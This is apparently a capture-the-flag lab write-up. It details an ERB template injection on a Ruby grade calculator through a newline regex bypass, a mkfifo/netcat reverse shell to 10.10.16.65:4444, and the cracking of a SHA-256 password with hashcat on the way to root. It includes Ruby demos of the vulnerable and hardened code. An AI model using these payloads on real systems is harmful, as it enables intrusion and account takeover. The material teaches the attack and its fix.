1. Nmap
sudo nmap -sC -sV -vv -p- -Pn 10.10.11.253 -T5
(-vv, not --vv; -p- scans all 65535 TCP ports, -Pn skips host discovery, -T5 is the fastest timing template and can drop results on a flaky link, so rerun at -T4 if the port list looks short.)
Open ports: 22 (SSH) and 80 (HTTP).
2. Port 80
whatweb 10.10.11.253
http://10.10.11.253 [200 OK]
Country[RESERVED][ZZ],
HTTPServer[nginx, WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)],
IP[10.10.11.253],
PoweredBy[WEBrick],
Ruby[3.0.2],
Script,
Title[Weighted Grade Calculator],
UncommonHeaders[x-content-type-options],
X-Frame-Options[SAMEORIGIN],
X-XSS-Protection[1; mode=block]
Server-side template injection (ERB), not XSS: the "category" field of the weighted grade calculator is rendered through ERB, so an ERB tag submitted as the category is evaluated on the server. The value sent (URL-encoded) is
a%0A<%25%3Dsystem("rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.65%204444%20%3E%2Ftmp%2Ff");%25>
which decodes to
a
<%=system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.65 4444 >/tmp/f");%>
i.e. a harmless value "a", a newline (%0A), then an ERB tag carrying a mkfifo reverse shell back to 10.10.16.65:4444. The newline is presumably what gets the tag past the field's input check: in Ruby, ^ and $ anchor at line boundaries, so a whitelist regex like /^[a-zA-Z0-9]+$/ only sees the "a" on the first line (\A and \z are needed to anchor the whole string). Only the category field is injectable.
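As an added example (not the box's source, which these notes do not include), a small Ruby reconstruction of the pattern the payload implies: a ^...$ whitelist that a newline slips past, and an ERB template built by string interpolation so the injected tag is evaluated. The hardened variant anchors with \A...\z and passes the field to ERB as data rather than as template source. The "6 * 7" payload is a constructed stand-in for the system() call above so the demo does not spawn a shell; decode_payload shows what the encoded blob on the page really sends.

```ruby
require "erb"
require "uri"

# The page's payload, URL-encoded exactly as submitted (rm instead of the typo lrm).
ENCODED = 'a%0A<%25%3Dsystem("rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff' \
          '%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.65%204444%20%3E%2Ftmp%2Ff");%25>'

# Constructed harmless payload with the same shape: benign value, newline, ERB tag.
PAYLOAD = "a\n<%= 6 * 7 %>"

def decode_payload(encoded)
  URI.decode_www_form_component(encoded)
end

# Weak validation: in Ruby ^ and $ match at line boundaries, so the regex is
# satisfied by the "a" on the first line and never looks at the ERB tag.
def weak_check(value)
  value.match?(/^[a-zA-Z0-9]+$/)
end

# Fixed validation: \A and \z anchor to the start and end of the whole string.
def strict_check(value)
  value.match?(/\A[a-zA-Z0-9]+\z/)
end

# Vulnerable render (assumed pattern): the user value becomes part of the
# template source, so any <%= %> inside it is executed by ERB.
def render_vulnerable(category)
  ERB.new("<p>Category: #{category}</p>").result(binding)
end

# Safe render: the template source is fixed; the value is only ever data and is
# HTML-escaped on output, so the ERB tag is shown literally, not evaluated.
def render_safe(category)
  ERB.new("<p>Category: <%= ERB::Util.html_escape(category) %></p>").result(binding)
end

if $PROGRAM_NAME == __FILE__
  puts decode_payload(ENCODED)
  puts "weak check passes:   #{weak_check(PAYLOAD)}"
  puts "strict check passes: #{strict_check(PAYLOAD)}"
  puts "vulnerable: #{render_vulnerable(PAYLOAD).inspect}"
  puts "safe:       #{render_safe(PAYLOAD).inspect}"
end
```

Run it with ruby; the vulnerable render turns the tag into 42 (the real payload would run system() at that point), while the safe render prints the tag as text and the strict check rejects the input outright.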
3. Revshell
Listener on 10.10.16.65:4444 (the address and port in the payload); submitting the category above gives a shell as the web user.
4. Privesc
LinPEAS findings:
/var/mail/susan is readable
susan is in group 27 (sudo)
The mail describes the password format: firstname_firstnamebackwards_number, with the number between 1 and 1,000,000,000. The hash found for susan is 64 hex characters, so it is assumed to be unsalted SHA-256 (hashcat -m 1400); crack it with a mask attack (-a 3) fixing the known prefix and brute-forcing the digits:
hashcat -m 1400 abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
Caveat: nine ?d cover 0..999,999,999 only; 1,000,000,000 itself is ten digits, so if nothing cracks, add a tenth ?d or use --increment.
Result: susan_nasus_413759210
ssh susan@10.10.11.253 with that password works, and because susan is in the sudo group, sudo su gives root.
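As an added example (not part of the original notes), the same mask attack written out in Ruby: build the fixed prefix from the first name, walk the numeric suffix over an explicit range, and compare SHA-256 digests. It also gives a one-line way to check that the password hashcat returned really matches the hash on the page. The full 1..1,000,000,000 range is hashcat's job, not Ruby's, so the demo at the bottom cracks a constructed hash over a small range; crack_numeric_suffix takes the range as a parameter precisely so the 10-digit upper bound the mail mentions is not silently dropped.

```ruby
require "digest"

# Values copied from the notes above.
PAGE_HASH = "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f"
PAGE_PASSWORD = "susan_nasus_413759210"

# Password structure from the mail: firstname_firstnamebackwards_N
def password_prefix(first_name)
  "#{first_name}_#{first_name.reverse}_"
end

# True if the candidate is the preimage of an unsalted SHA-256 hex digest.
def verify_password(hash_hex, candidate)
  Digest::SHA256.hexdigest(candidate) == hash_hex.downcase
end

# Brute-force the numeric suffix over the given range (hashcat's
# susan_nasus_?d?d?d?d?d?d?d?d?d is the 0..999_999_999 case of this; the
# mail's upper bound 1_000_000_000 needs a tenth digit). Returns the
# recovered password, or nil if no candidate in the range matches.
def crack_numeric_suffix(hash_hex, first_name, range)
  prefix = password_prefix(first_name)
  target = hash_hex.downcase
  range.each do |n|
    candidate = "#{prefix}#{n}"
    return candidate if Digest::SHA256.hexdigest(candidate) == target
  end
  nil
end

if $PROGRAM_NAME == __FILE__
  # Sanity check on hashcat's answer: prints true only if PAGE_PASSWORD hashes to PAGE_HASH.
  puts "hashcat result matches page hash: #{verify_password(PAGE_HASH, PAGE_PASSWORD)}"

  # Constructed demo: hash a made-up password in the same format and recover it.
  demo_hash = Digest::SHA256.hexdigest("susan_nasus_4137")
  p crack_numeric_suffix(demo_hash, "susan", 1..10_000)
end
```

The range parameter is the point: a mask attack is only as complete as the keyspace you give it, so write the bound from the source (here the mail) into the search rather than trusting a mask you typed from memory.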